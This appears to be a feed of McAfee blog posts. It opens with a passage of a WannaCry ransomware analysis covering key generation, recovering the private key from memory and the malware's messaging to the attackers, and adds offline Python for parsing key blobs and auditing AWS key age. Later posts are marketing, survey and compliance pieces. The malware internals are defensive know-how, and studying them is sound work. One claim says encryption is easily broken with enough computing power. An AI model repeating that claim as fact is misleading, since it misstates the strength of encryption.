Figure 1: Crypto API breakpoints for key import and export.

As WannaCry initializes, it calls CryptGenKey to generate a new random key, the handle to which is returned in the fourth parameter.


Figure 2: Creating a new random key.

Next, WannaCry exports the public key from the generated key and saves it to the file 00000000.pky (the encrypted private key is written separately to 00000000.eky, as described below). Note the presence of 0x06 and RSA1. This indicates that the exported key blob is a public key. To view the key blob, save the address of the buffer and buffer size in temporary registers, allow the function to return, and dump the key blob using the address and size values from the temporary registers.

Figure 3: Capturing the user’s public key.

Next, WannaCry exports the private-public key pair to memory. Note the presence of 0x07 and RSA2 in the exported buffer.

Figure 4: Capturing the user’s private-public key pair.

Immediately afterward, WannaCry encrypts the user’s private key with the attacker’s public key and writes the file to 00000000.eky. The contents of this file are sent to the attackers when the user clicks “Check Payment” (as discussed further in “Can the attackers be contacted?”).

At this moment, the private-public key pair is easily recoverable, so we can issue a command to dump that memory to a file, as shown below:

Figure 5: Writing the private key to disk from WinDbg.

In Figure 5, we have given the private key almost the correct name. If the file 00000000.dky exists and contains a valid private key that can decrypt files, WannaCry will abort its encryption run. To decrypt files, rename the file to 00000000.dky once all files have been encrypted, and click on Decrypt.

Figure 6: Dialog after WannaCry successfully decrypts all files.

Based on this analysis, WannaCry is capable of per-user decryption, provided that WannaCry can send the user’s private key to the back end, receive the decrypted private key, and place it in the correct location.

Can the attackers be contacted?

WannaCry provides two methods of communication with the attackers: the “Contact Us” link and the “Check Payment” button on the main decryptor interface, shown below in Figure 7.

Figure 7: WannaCry’s Decryptor interface.

If WannaCry allowed recovery, both interface controls should function. Assuming that all communication is over standard network sockets, we can inspect the traffic in real time using WinDbg/IDA Pro with the breakpoints in Figure 8.

Figure 8: Breakpoints for analyzing network traffic.

Our goal is to determine what is being sent to and received from the back end. The detail is not shown here, but WannaCry makes use of Tor to anonymize communications with the attackers, cycling through many Tor servers. We looked for the user’s private key being sent to the back end, where we expected it to be decrypted and sent back if the user had paid the ransom (or if the attackers had decided to randomly decrypt a user’s key). We found one message that was large enough. An example is shown in Figure 9.

Figure 9: A large and interesting buffer sent to the back end.

However, the data did not match any part of the user’s private key stored on disk; could this communication be encrypted? Looking at the call stack, we saw several frames:

Figure 10: Post encryption send call stack.

Looking at the previous frame, we saw a simple wrapper around ws2_32!send, so this is not an encryptor.

Figure 11: ws2_32!send wrapper.

Looking at the frame before the send wrapper in Figure 11, we found a reasonably long function beginning at 0x0040d300 that appears to be responsible for obfuscating the buffer, and we confirmed that using IDA Pro with a second breakpoint, as shown below:

Figure 12: Message obfuscator function breakpoint.

Rerunning our Check Payment debugging run, our new breakpoint fired and revealed the message to be sent prior to obfuscation:


Figure 13: Message to be sent to back end.

The message encodes information that identifies the user. We color-coded the message components in Figures 13 and 15:

  • Green: The 8-byte unique ID stored in the first 8 bytes of 00000000.res. This is created by a call to CryptGenRandom during WannaCry’s initialization and persists for the life of the attack.
  • Orange: The computer name retrieved with GetComputerNameA.
  • Red: The user’s name retrieved by GetUserNameA.
  • Bold: The Bitcoin wallet ID that the user should have sent money to, and the amount that the user should have paid.
  • Cyan: The encrypted user’s private key as read from 00000000.eky.

Based on the message content, it is reasonable to assert that the attacker’s back end receives all the information required to identify users who have paid the ransom, and should be able to perform per-user decryption, provided there is a mechanism for users to tie their Bitcoin transfers to the 8-byte unique ID that represents their specific encryption instance. However, we found no mechanism to do this and there are no interface elements or instructions to help.

Running the same experiment using the Contact Us interface shown in Figure 14, we sent a message “Hey! Can I have my files back?” to the attackers, and using our breakpoint from Figure 12, we determined that a common messaging framework is used.

Figure 14: Messaging interface.


Figure 15: Message sent to back end.

The results in Figure 15 show:

  • Both Check Payment and Contact Us appear to use a common messaging format
    • 8-byte unique ID, machine name, username is always sent.
    • The payload can vary according to message type.

As a result, we conclude that the attackers should have been able to uniquely identify a user but they clearly omitted a mechanism to tie a payment to an ID, making per-user decryption technically impossible.

Can the authors respond? Can they return a private key?

Shortly after its release, Check Payment began returning a message to users instructing them to use the Contact Us mechanism to send the users’ Bitcoin wallet addresses, as shown in Figure 16.

Figure 16: Request for a Bitcoin wallet address.

This message confirms that the attackers can respond. It also gives us an opportunity to analyze the flow of Check Payment messages. Using the same send and recv breakpoints from Figure 8, we received the following obfuscated message:

Figure 17: Encrypted response received from attackers.

Using the following breakpoint, we then watched for that data being written to the obfuscated buffer; if the obfuscation removal occurs in place, we should be able to look at the decrypted buffer.

Figure 18: Message decryption breakpoint.

Once the breakpoint fires, we saw that the message was modified in place:

Figure 19: In-place decryption of the encrypted message.

Our analysis of the function in question in WinDbg and IDA Pro indicated that on return the message was in plain text. Issuing the gu command to step out of the function, we saw the message decrypted, as shown in Figure 20.

Figure 20: Decrypted check-payment message.

This is the same message that we saw displayed in the dialog box, so end-to-end communication is working. But, how is this message used? Again, we made use of a hardware breakpoint, as shown in Figure 21.

Figure 21: Hardware breakpoint to track the decrypted message.

The preceding breakpoint triggers during a call to fwrite to 00000000.dky; the message is written to the file that should contain the user’s private key, as shown below in the subsequent call to WriteFile made on behalf of fwrite and fflush.

Figure 22: Entire message being written to 00000000.dky

The entire message, or whatever was sent back to the decryptor, is written to the file 00000000.dky. Thus we conclude that Check Payment should return a crypto API key blob for the user’s private key. By enabling our key import breakpoint shown in Figure 1, we verified this, as shown below:

Figure 23: The decrypted message imported as a key in CryptImportKey.

Note the value of eax at the bottom of Figure 23 after CryptImportKey has returned: eax is 0, which means that CryptImportKey failed. If CryptImportKey fails, then WannaCry eventually deletes 00000000.dky and displays the message to the user. If CryptImportKey succeeds, the user can successfully decrypt all the files.

From this analysis, we conclude:

  • The WannaCry communication fabric is active and can return messages.
  • The WannaCry back end is live and tracking users because the help message is returned only once.
  • The WannaCry client expects that a message or private key can be returned from the back end:
    • If the message is not a private key (CryptImportKey fails), the client assumes the message is text that should be shown to the user.
    • Private keys are left on disk in 00000000.dky and allow the user to decrypt their files.
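The key blobs captured in Figures 3 and 4, and the key-or-message decision the client makes on whatever Check Payment returns, can be modeled offline. The following Python is an added example written for this page, not code from the original post or from WannaCry itself. It implements the documented CryptoAPI PUBLICKEYBLOB (bType 0x06, magic RSA1) and PRIVATEKEYBLOB (bType 0x07, magic RSA2) layouts that CryptExportKey produces and CryptImportKey consumes, decrypts with the CRT parameters a private blob carries, and classifies an arbitrary response the way the decryptor effectively does: importable private key, or text to display. The toy 64-bit key, the sample message, and the helper names are constructed for the example; treating a public blob as a message is a simplification, since CryptImportKey would accept it even though it cannot decrypt.

```python
"""Microsoft CryptoAPI RSA key blobs: build, parse, decrypt, classify.

Added example, not code from the original post or from WannaCry. Layouts follow
the documented BLOBHEADER + RSAPUBKEY + little-endian key material format.
"""
import struct

CALG_RSA_KEYX, CALG_RSA_SIGN = 0x0000A400, 0x00002400
PUBLICKEYBLOB, PRIVATEKEYBLOB = 0x06, 0x07
MAGIC_RSA1, MAGIC_RSA2 = b"RSA1", b"RSA2"


def _le(n, size):
    return n.to_bytes(size, "little")


def _int(b):
    return int.from_bytes(b, "little")


def build_blob(n, e, bitlen, p=None, q=None, d=None):
    """Serialize an RSA key as a CryptoAPI blob (public if p/q/d are omitted)."""
    private = p is not None
    blob = struct.pack("<BBHI", PRIVATEKEYBLOB if private else PUBLICKEYBLOB,
                       2, 0, CALG_RSA_KEYX)            # BLOBHEADER
    blob += (MAGIC_RSA2 if private else MAGIC_RSA1) + struct.pack("<II", bitlen, e)
    blob += _le(n, bitlen // 8)                          # modulus
    if private:
        half = bitlen // 16                              # prime1, prime2, exp1, exp2, coef
        blob += _le(p, half) + _le(q, half)
        blob += _le(d % (p - 1), half) + _le(d % (q - 1), half)
        blob += _le(pow(q, -1, p), half)                 # coefficient = q^-1 mod p
        blob += _le(d, bitlen // 8)                      # privateExponent
    return blob


def parse_blob(blob):
    """Parse a blob; raise ValueError if it is not a well-formed RSA key blob."""
    if len(blob) < 20:
        raise ValueError("too short for BLOBHEADER + RSAPUBKEY")
    btype, _ver, _res, alg = struct.unpack_from("<BBHI", blob, 0)
    magic = blob[8:12]
    bitlen, e = struct.unpack_from("<II", blob, 12)
    if (btype, magic) not in ((PUBLICKEYBLOB, MAGIC_RSA1), (PRIVATEKEYBLOB, MAGIC_RSA2)):
        raise ValueError("bType/magic mismatch: not an RSA key blob")
    if alg not in (CALG_RSA_KEYX, CALG_RSA_SIGN) or bitlen % 16:
        raise ValueError("unexpected algorithm or bit length")
    nbytes, half, off = bitlen // 8, bitlen // 16, 20
    key = {"type": "private" if btype == PRIVATEKEYBLOB else "public",
           "bitlen": bitlen, "e": e, "n": _int(blob[off:off + nbytes])}
    off += nbytes
    if btype == PRIVATEKEYBLOB:
        for name in ("p", "q", "dp", "dq", "qinv"):
            key[name] = _int(blob[off:off + half])
            off += half
        key["d"] = _int(blob[off:off + nbytes])
        off += nbytes
    if off != len(blob):
        raise ValueError("trailing bytes after key material")
    return key


def rsa_decrypt_crt(key, c):
    """Textbook RSA decryption using the CRT parameters stored in the blob."""
    if key["type"] != "private":
        raise ValueError("a public blob cannot decrypt")
    m1 = pow(c, key["dp"], key["p"])
    m2 = pow(c, key["dq"], key["q"])
    h = (key["qinv"] * (m1 - m2)) % key["p"]
    return m2 + h * key["q"]


def classify_response(data):
    """Model the decryptor's handling of the Check Payment reply: if the bytes
    parse as a private key blob, treat them as the key; otherwise as text."""
    try:
        key = parse_blob(data)
        return ("key", key) if key["type"] == "private" else ("message", data)
    except ValueError:
        return ("message", data)


# Toy 64-bit key from two 32-bit primes; constructed for the example, not real.
P, Q, E = 4294967291, 4294967279, 65537
N = P * Q
D = pow(E, -1, (P - 1) * (Q - 1))
PRIVATE_BLOB = build_blob(N, E, 64, P, Q, D)
PUBLIC_BLOB = build_blob(N, E, 64)

if __name__ == "__main__":
    m = 0x48656C6C6F                       # "Hello" as an integer, smaller than N
    c = pow(m, E, N)
    kind, key = classify_response(PRIVATE_BLOB)
    print(kind, hex(rsa_decrypt_crt(key, c)))
    print(classify_response(b"Send your Bitcoin wallet address via Contact Us")[0])
```

A blob dumped from the WinDbg session in Figure 5 can be fed to parse_blob as-is; for a 2048-bit key the private blob is 20 + 256 + 5 x 128 + 256 = 1172 bytes, and the bType/magic check at the top of parse_blob is exactly what distinguishes the Figure 3 export (0x06, RSA1) from the Figure 4 export (0x07, RSA2).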

Decryption does not work because the authors omitted a link between payment and the unique ID. But what happens if a user follows the instructions and sends the Bitcoin wallet ID to the attackers? Can the victim decrypt files? So far, a tiny sample of victims has reported the decryption of files, but this appears not to be tied to the payment-making function.

Although the message indicates that a user may be able to get the files back (which supports the theory of shoddy design), our limited testing indicated that decryption keys are not returned and files cannot be restored even after payment, which adds weight to the possibility that WannaCry is a prank or test.

Does WannaCry prevent recovery of file data?

Yes and no. There has been a lot of excellent research showing that in some circumstances, files are recoverable:

  • Files on removable and nonsystem volumes.
  • Read-only files.
  • Temporary files.

Files stored in the Desktop and Documents folders are the hardest to recover. What does this mean for our theories? Both are still supported:

  • Developer incompetence: Incorrectly deleting and overwriting original files indicates a hurried or poor engineer.
    • There is a difference between not realizing that per-user file decryption can never work without the unique ID and running into filesystem processing bugs for large batch operations; errors in batch processing are much easier to explain.
  • Prank: The techniques for preventing recovery support the theory that the developers did not go to great lengths to prevent recovery from unpredictable folders and devices:
    • Removable, network, and fixed nonsystem volumes may support file carving as a recovery technique. This is also true for devices that make use of wear leveling.
    • Online storage folders and some versioning tools may provide alternative recovery mechanisms for files.
    • Desktop and Documents folders are the most common file locations. Many users would not be able to recover most of their files.

We do not believe that WannaCry’s file data recovery prevention strongly supports either thesis.

Does WannaCry prevent recovery of key material?

The most important key for data recovery is the user’s private key. We used hardware breakpoints to see what happens to the exported key blob in our earlier example, as shown below:

Figure 24: Hardware breakpoint to trigger on writes to the key blob.

When this breakpoint fires, we found the following code zeroing out the exported key blob:

Figure 25: Assembly of code that modifies the exported key blob.

Thanks to care taken with data sanitization (such as that shown in Figure 25) and the correct use of CryptDestroyKey, WannaCry keeps the user’s private key in a nonencrypted form for the shortest possible time. Thus private key recovery is impractical beyond exploiting issues in the Windows APIs (as described by other authors).

Although the attacker’s motive may remain unknown for some time, we commend the response from victims, who have generally decided to not pay. Our research continues into this campaign; we will release more data as more information arises.

Why This California State Agency Compares McAfee ENS to a New Car https://securingtomorrow.mcafee.com/business/california-state-agency-compares-mcafee-ens-new-car/ https://securingtomorrow.mcafee.com/business/california-state-agency-compares-mcafee-ens-new-car/#respond Thu, 08 Jun 2017 14:00:57 +0000 https://securingtomorrow.mcafee.com/?p=74724

The post Why This California State Agency Compares McAfee ENS to a New Car appeared first on McAfee Blogs.

“If you think of endpoint protection as a car,” says Security Engineer Jeff Bowen at the California Department of Water Resources (DWR), “with McAfee ENS, we now have the latest model, with the best instrumentation, nicest features, and all the bells and whistles.”

His CISO agrees. “With McAfee ENS, we remediate faster, have less business disruption, make better decisions, and protect neighboring workstations and our overall environment—instead of focusing all our attention on an infected workstation while another one gets hit,” notes Chief Information Security Officer Richard Harmonson.

The largest of 30 departments within the California Natural Resources Agency (CNRA), the DWR provides technology infrastructure-as-a-service to the entire state agency. Harmonson and his security team purchase, deploy, and provide multi-tenancy security solutions across the CNRA’s 16,000 endpoints. In the past, the DWR provided another vendor’s endpoint solution to CNRA departments, but that product’s limited visibility, very high false positive rate, and dated technology— “the typical anti-virus product that we’ve seen for the past two decades”— drove Harmonson and his team to seek a better solution.

The DWR information security team found what it was looking for in McAfee ENS version 10.5, which it rolled out across all 4,000 end-user physical devices within DWR. DWR will deploy ENS across the remaining CNRA departments in the coming months, and eventually across virtualized servers as well.

So why are Harmonson and his staff as delighted with McAfee ENS as with a new car?

Three main reasons.

First, improved protection and detection. “Since we rolled out McAfee ENS, we have been detecting and blocking threats we didn’t see before,” says Harmonson. That’s because its Real Protect machine learning behavioral analysis technology catches more malware, and its Dynamic Application Containment (DAC) functionality immediately quarantines unknown threats so they can be analyzed, protecting Patient Zero from damage.

Second, improved decision making that enables faster response and remediation. According to Harmonson, this is one of the greatest benefits thus far since deploying McAfee ENS. “McAfee ENS is providing us with more and better information to help us better understand the threats that enter our environment,” he says. Instead of having to wait 24 hours for its anti-virus vendor to create a new signature, DWR is “getting to the point where we can investigate an incident and resolve it within one to four hours.”

Third, ability to take advantage of McAfee Data Exchange Layer (DXL) integration.  McAfee ENS is built to leverage DXL. With the DWR’s recent addition of a McAfee Advanced Threat Defense (ATD) sandboxing appliance and soon-to-be-deployed McAfee Threat Intelligence Exchange and McAfee Endpoint Threat Defense and Response, the organization will be able to share local and global threat information in near real-time among these systems. With these additional McAfee tools, Harmonson expects to create a more adaptive, sustainable threat defense lifecycle that reduces the administrative burden on staff even further, which is especially important since adding staff with the right skill set can be a challenge.

Because of his experience thus far, Harmonson encourages colleagues and counterparts in other California state agencies to consider McAfee ENS. “With the layers of protection that [McAfee ENS] provides, it far exceeds the stereotypical anti-virus product,” he says. “I really appreciate how it provides my staff with the relevant information at their fingertips, helps them understand what happened, accelerates response time, and mitigates risk.”

The full case study on the California Department of Water Resources is available from McAfee. Get your questions answered by tweeting @McAfee_Business.

Majority of organizations expect cyberattack this year https://securingtomorrow.mcafee.com/business/optimize-operations/majority-of-organizations-expect-cyberattack-this-year/ Wed, 07 Jun 2017 21:38:41 +0000 https://securingtomorrow.mcafee.com/?p=74878

The post Majority of organizations expect cyberattack this year appeared first on McAfee Blogs.

A majority of organizations think they will experience a cyber security attack this year, and many are not prepared, according to a new report from ISACA, a global association that helps individuals and enterprises optimize their use of technology.

ISACA’s State of Cyber Security report, based on a survey of more than 600 security executives worldwide, shows that four out of five organizations think they will be attacked this year. Only 46 percent of those organizations have confidence in their cyber defense teams.

“There is a significant and concerning gap between the threats an organization faces and its readiness to address those threats in a timely or effective manner,” said Christos Dimitriadis, ISACA board chair and group head of information security at INTRALOT. “Cyber security professionals face huge demands to secure organizational infrastructure, and teams need to be properly trained, resourced and prepared.”

Among the other key findings of the research is that cyber security budgets are still expanding, but more slowly. Half of the respondents (50 percent) anticipate budget growth over the next year, which is down from 61 percent last year.

Enterprises continue to have difficulty finding qualified personnel. Only 30 percent receive 10 applicants or more for an open position, of which less than half are qualified. At the same time, the threat environment is increasingly hostile, with 53 percent of respondents reporting an increase in attacks in 2016.

The Internet of Things (IoT) is replacing mobile technology as a major area of concern. IoT concerns show no sign of slackening, the report said. And ransomware is expanding, but the processes to address it are not. Nearly two thirds of organizations (62 percent) experienced ransomware attacks in 2016, but only 53 percent have a formal process in place to address it.

This article was written by Bob Violino from Information Management and was legally licensed through the NewsCred publisher network. Please direct all licensing questions to legal@newscred.com.

Customer Data Exposed in OneLogin Data Breach https://securingtomorrow.mcafee.com/business/customer-data-exposed-onelogin-data-breach/ https://securingtomorrow.mcafee.com/business/customer-data-exposed-onelogin-data-breach/#respond Wed, 07 Jun 2017 17:05:35 +0000 https://securingtomorrow.mcafee.com/?p=74843

The post Customer Data Exposed in OneLogin Data Breach appeared first on McAfee Blogs.

From Azure to AWS – cloud adoption is booming, which has security professionals trying to find the right formula for securing the cloud. Now, a new data breach at OneLogin, whose business is providing secure access to multiple cloud applications, has reaffirmed the need for cloud security.

How did the breach happen? It is unknown exactly how the attackers obtained them, but they used AWS keys to enter the vendor’s environment and operated there for hours before abnormally high activity in the OneLogin database alerted the internal team that something was awry. Once aware, the team took only minutes to shut down the AWS instances and retire the AWS keys to prevent further access. But, of course, a fair amount of damage had already been done.

The cybercriminal responsible was able to access databases with information about users, apps, and various types of keys. That data is encrypted, but there is high suspicion that it may have been decrypted by the threat actors. As McAfee CTO Steve Grobman has said, encryption is, at the end of the day, just math—math that hackers can easily figure out with enough compute power.

The reason OneLogin was attacked was to steal these credentials, which is part of a larger trend that our McAfee Labs 2017 Threats Predictions report anticipated. Passwords, and the people who create and use them, will remain the biggest weakness throughout most technologies for the foreseeable future. Cloud authentication is no different and actually represents a much bigger payoff for thieves. The proliferation of cloud apps and services, and human fondness for using the same or similar password for each cloud service, exacerbates the problem.

This breach may, in part, also stem from insufficient database and cloud security procedures, but it brings up a larger issue regarding identity and password management tools. Users place much trust and faith in the services where they store their passwords to their work and personal accounts. Breaches require them to go through a series of frustrating steps to secure those accounts, including generation of new API credentials and OAuth tokens. A OneLogin customer who spoke with Ars Technica said they were having to “rebuild the whole authentication security system… OUCH!”

The attack vectors in this breach also require companies to ask some critical questions. For example, should they make a policy to retire AWS keys after 30, 60, or 90 days? How is an attacker able to access decryption keys for such an important set of data stored in a database? Organizations need to rethink how and where they store data, as well as encryption keys.
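One concrete way to answer the key-rotation question above is to inventory access keys by age and by last use, so that a 30, 60, or 90 day policy can be checked against what is actually deployed. The following Python is an added example written for this page, not code from the original post, from OneLogin, or from AWS. It runs offline against constructed sample records shaped like the AccessKeyMetadata that boto3’s iam.list_access_keys() returns and the LastUsedDate that iam.get_access_key_last_used() returns; the user names, key IDs, dates, and thresholds are all constructed assumptions.

```python
"""Inventory IAM access keys by age and last use.

Added example, not from the original post. Assumptions (not from the post): the
records are shaped like boto3's iam.list_access_keys()["AccessKeyMetadata"]
and iam.get_access_key_last_used()["AccessKeyLastUsed"]["LastUsedDate"]; every
name, key ID and date below is constructed sample data.
"""
from datetime import datetime, timezone

NOW = datetime(2017, 6, 7, tzinfo=timezone.utc)   # fixed clock for a repeatable run

# Constructed sample: what list_access_keys() would return across several users.
SAMPLE_KEYS = [
    {"UserName": "deploy-bot", "AccessKeyId": "AKIAEXAMPLE000000001",
     "Status": "Active", "CreateDate": datetime(2017, 1, 10, tzinfo=timezone.utc)},
    {"UserName": "alice", "AccessKeyId": "AKIAEXAMPLE000000002",
     "Status": "Active", "CreateDate": datetime(2017, 5, 1, tzinfo=timezone.utc)},
    {"UserName": "bob", "AccessKeyId": "AKIAEXAMPLE000000003",
     "Status": "Inactive", "CreateDate": datetime(2016, 3, 1, tzinfo=timezone.utc)},
    {"UserName": "ci-runner", "AccessKeyId": "AKIAEXAMPLE000000004",
     "Status": "Active", "CreateDate": datetime(2017, 5, 20, tzinfo=timezone.utc)},
]

# Constructed sample: get_access_key_last_used() per key; None means never used.
SAMPLE_LAST_USED = {
    "AKIAEXAMPLE000000001": datetime(2017, 6, 6, tzinfo=timezone.utc),
    "AKIAEXAMPLE000000002": None,
    "AKIAEXAMPLE000000003": datetime(2016, 4, 1, tzinfo=timezone.utc),
    "AKIAEXAMPLE000000004": datetime(2017, 5, 21, tzinfo=timezone.utc),
}


def age_days(when, now=NOW):
    return (now - when).days


def stale_keys(keys, max_age_days, now=NOW):
    """Active keys created more than max_age_days ago. Inactive keys cannot be
    used and are left out; the rotation question is about what still works."""
    return sorted(k["AccessKeyId"] for k in keys
                  if k["Status"] == "Active"
                  and age_days(k["CreateDate"], now) > max_age_days)


def idle_keys(keys, last_used, max_idle_days, now=NOW):
    """Active keys never used, or not used within max_idle_days. An idle key is
    the cheapest one to retire and the one an attacker can hold longest unnoticed."""
    out = []
    for k in keys:
        if k["Status"] != "Active":
            continue
        used = last_used.get(k["AccessKeyId"])
        if used is None or age_days(used, now) > max_idle_days:
            out.append(k["AccessKeyId"])
    return sorted(out)


def rotation_report(keys, last_used, now=NOW, ages=(30, 60, 90), idle=30):
    """Group keys by which candidate rotation policy they would already violate."""
    report = {f"older_than_{a}d": stale_keys(keys, a, now) for a in ages}
    report[f"idle_over_{idle}d"] = idle_keys(keys, last_used, idle, now)
    return report


if __name__ == "__main__":
    # With live credentials, `keys` would come from
    # boto3.client("iam").list_access_keys(UserName=u)["AccessKeyMetadata"]
    # for each user, and `last_used` from get_access_key_last_used(AccessKeyId=k).
    for policy, ids in rotation_report(SAMPLE_KEYS, SAMPLE_LAST_USED).items():
        print(f"{policy}: {ids}")
```

On the sample data, a 90 day policy flags only the deploy-bot key, a 30 day policy also flags alice’s key, and the idle check flags alice’s key because it has never been used at all; the stricter the threshold, the more operational rotation work it implies, which is exactly the trade-off the question above asks about.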

For more information about this breach and others like it, make sure to follow @McAfee and @McAfee_Business.

Connected Vacations: Top Takeaways from Our Unplugging Survey https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/connected-vacations-top-takeaways-from-our-unplugging-survey/ https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/connected-vacations-top-takeaways-from-our-unplugging-survey/#respond Wed, 07 Jun 2017 04:01:14 +0000 https://securingtomorrow.mcafee.com/?p=74803

The post Connected Vacations: Top Takeaways from Our Unplugging Survey appeared first on McAfee Blogs.

It’s June, which means the sun is shining, school’s out, and it’s time for a family summer vacation! Whether you’re jet-setting to Hawaii or backpacking through the mountains, vacations are a great excuse to take a break from your connected devices and enjoy face-to-face quality time with loved ones. Not to mention, unplugging from your devices while on vacation can also help with personal security. However, even though most people want to unplug, how often do they actually remain disconnected? We decided to take a look and surveyed more than 2,000 people, aged 18-55 years old, to examine their behavior and attitudes towards their connected devices while traveling.

People Want to Unplug, but Don’t Feel Like They Can

Out of those surveyed, 43% went on vacation with the intent to unplug, and of that 43%, 81% reported having a more enjoyable vacation because of the lack of connectivity. Those who didn’t most likely wished they could have. In fact, if work obligations were not a factor, 57% of individuals would prefer to completely unplug on vacation. This is most true for younger workers in their 20s and 30s, with 69% claiming they would want to completely unplug vs. less than half (49%) of individuals in their 40s.

Beyond work obligations, vacationers want to stay in contact with loved ones, with 62% claiming they stayed connected to be reachable by friends and family.

So, for those that simply had to stay connected, what were they glued to the most?

More than half of people (52%) indicated that they spend at least an hour a day on vacation using their connected devices, with 38% saying they couldn’t last more than a day without checking email (work or personal), 37% not lasting more than a day without checking social media, and more than half (54%) not lasting more than a day without texting.

Incentives for Unplugging

So out of those who did in fact unplug, why exactly did they do it? The main reasons survey respondents reported for unplugging varied, but the top ones include: being in the moment (69%), the need for stress relief (65%), taking a break from work (44%), and being respectful of others (36%). In fact, according to another recent McAfee survey, 40% of individuals felt their significant other paid more attention to their own devices when they were together one-on-one and 45% reported getting into an argument with a friend, significant other, or family member over being on a device while together.

Staying Secure While Staying Relaxed

So now the next question is: if travelers do choose to stay connected while on vacation, are they doing so securely?

Whether they’re using Wi-Fi in the airport or emailing in their hotel room, vacationers tend to put personal security lower on their list of priorities while they’re out of town. When it comes to Wi-Fi security specifically, 58% of respondents know how to check whether a Wi-Fi network is secured and safe to use, but less than half (49%) take the time to ensure their connection is secured. Twenty percent don’t think about the security of their Wi-Fi network at all, and for 32%, whether they check the security of the network depends on how badly they need to connect. We also found that parents tend to be more security-minded than their non-parent counterparts and are more likely to know whether their Wi-Fi connection is secured and safe to use (63% of parents vs. 54% of non-parents).

So, if you do choose to remain plugged in while on vacation, make sure to keep these security tips in mind:

-Browse securely when away from home. It can be tempting to use your connected device while on vacation. If you can’t resist, be sure that you are connecting securely. Avoid public or unsecured Wi-Fi networks, which can expose your personal data and information to a cybercriminal. If you absolutely must connect to a public Wi-Fi network, use a Virtual Private Network (VPN) like McAfee Safe Connect. A VPN will keep your information encrypted and ensure that data goes straight from your device to where you are connecting.

-Update your devices. The first line of defense for your devices is you, so it’s important to take a few precautions to stay safe. Make sure your devices’ operating system and applications are up to date. Using old versions of software could leave you open to security vulnerabilities.

-Install comprehensive security. After you’ve updated your devices with the latest software, install comprehensive security. A solution like McAfee LiveSafe can ensure your devices stay clear of viruses and other unwanted malware.

And, of course, stay on top of the latest consumer and mobile security threats by following me and @McAfee_Home on Twitter, and ‘Like’ us on Facebook.

Preparing for the General Data Protection Regulation 2017, Part 3: Key Questions to Ask Your Cloud Provider
https://securingtomorrow.mcafee.com/languages/german/vorbereitung-auf-die-datenschutz-grundverordnung-2017-teil-3-wichtige-fragen-die-sie-ihrem-cloud-anbieter-stellen-sollten/
Tue, 06 Jun 2017 22:12:22 +0000

This is the third in a series of blog posts intended to prepare security leaders and business executives for the General Data Protection Regulation (GDPR) in 2017.

Are you thinking about moving applications to the cloud? If so, and what company isn’t, have you considered the impact of the EU General Data Protection Regulation (GDPR) on those plans?

At McAfee, we believe the GDPR offers an opportunity for a security transformation: a chance to abandon a compliance-driven security approach and move to a strategy of privacy and security by design.

The GDPR distances itself from earlier compliance schemes and, instead of prescribing a checklist of security technology controls, now requires companies to develop sustainable security capabilities. It therefore gives you a chance to review your entire data and security strategy and strengthen your resilience instead of compiling checklists. We believe that the GDPR is an opportunity to view security as a key enabler for the business, and in particular as a key enabler for the secure use of cloud services.

Whether you are moving legacy applications to the public cloud, using cloud storage or consuming cloud-based business applications such as Office 365, in every case you need to consider the concrete impact of the GDPR and take the opportunity to review or develop a broader cloud security strategy.

At McAfee, we want your company to say yes to using the cloud. Below, therefore, are some key questions and considerations so that you can talk to your cloud service provider as an equal about the GDPR and the required security measures:

Does your cloud service provider have a privacy policy?

Solid and transparent security policies are the first step. In many cases the GDPR requires the appointment of a Data Protection Officer (DPO) to oversee the programme. Also ask for a conversation with the DPO at your cloud provider.

How does your cloud service provider use the data it collects?

Providers are obliged to tell you how, if at all, they use the data collected through the service and how they protect that information. Many companies use collected data for analytics or other legitimate purposes. However, these processes should not create any additional risk for you.

Which security frameworks, standards or certifications does your cloud service provider follow, or which has it achieved for your service?

There are various industry-specific guides and processes that specify standardised requirements and controls for protecting cloud services. FedRAMP, for example, is a comprehensive process for authorising cloud services for the US government; it is based on NIST, however, and could be used more broadly. Internationally there is the ISO 27002 standard, for which the Cloud Security Alliance provides additional guidance. Cloud providers should use one of the available frameworks to assess and continuously monitor their maturity.

Can your cloud service provider identify a data breach, and how would it respond?

Statistically, more than half of all data breaches are discovered by external organisations. Given that the GDPR requires notification to the competent supervisory authority within 72 hours of the company becoming aware of an incident, it is extremely important to have the ability to detect potential data breaches and to respond with a proven process. Ask your cloud provider whether it has a security operations centre (SOC) or a computer security incident response team (CSIRT), in house or as a managed service, with those capabilities.

Where does your cloud service provider store and process the data it collects?

Data residency is probably the biggest issue when it comes to cloud services and preparing for the GDPR. Does your cloud provider have data centres in the EU, or only in the US? Where does it store and process the data? Is data moved from the EU to the US? These are only some of the issues in this area, but they can be resolved with encryption of data at rest, access control and key management.

These were all considerations regarding the GDPR and cloud service providers, although this is not an exhaustive list. Hopefully they have given you, as a user of these services, enough information to be well equipped to prepare for the GDPR. Above all, however, these practices make for more secure cloud use by companies.

How To Plan For Security Incident Response
https://securingtomorrow.mcafee.com/business/optimize-operations/how-to-plan-for-security-incident-response/
Tue, 06 Jun 2017 19:46:22 +0000

Planning for the seemingly unlikely event of a severe cybersecurity incident seems unwieldy and time-consuming for many organizations. But consider this: According to the Ponemon Institute, 90% of organizations that go offline due to a cyberattack shutter their windows in the following two years.

A strong incident response plan is clearly a necessity these days. From threats like the recent WannaCry ransomware attack to the Google Docs phishing scam, there are a number of ways a security incident can unfold at your organization. Having a tested incident response plan in your back pocket can make the difference between a swift recovery and a high-stress situation in which every minute the incident remains unresolved results in more financial or reputational damage.

There are three fundamental components that will help ensure that your company’s incident response plan is a success.

Define security incidents and likely scenarios. While all IT service incidents deserve swift identification and triage, security incidents, which often involve malicious intent, must be identified and tackled even more quickly. For example, a server at your company is unexpectedly rebooted in the middle of the day. This could be caused by an innocuous outage, or it could be something far more sinister. Perhaps an unknown third party has installed a rootkit, and the system is restarting so that changes can be applied, giving that third party unauthorized system access.

As you think through the possible incidents and scenarios, think about security best practices that can be circumvented (such as authentication) and cues from the news as your guide to recent, real threats (such as phishing and ransomware attempts).

What experts and stakeholders will be mobilized to handle all of the security, privacy and legal implications when a security incident occurs? How will your organization recover from a successful phishing attack? How will your organization cope with news of a severe data leak? What will you do once hackers are booted from your system? Play out each possible incident and how you would realistically respond. From there, write your incident response plan and procedures accordingly.

One resource to get you started is a generic incident handling procedure template from the Computer Security Incident Response Team. This is a good baseline document, but you’ll need to tailor it to meet your organization’s specific needs.

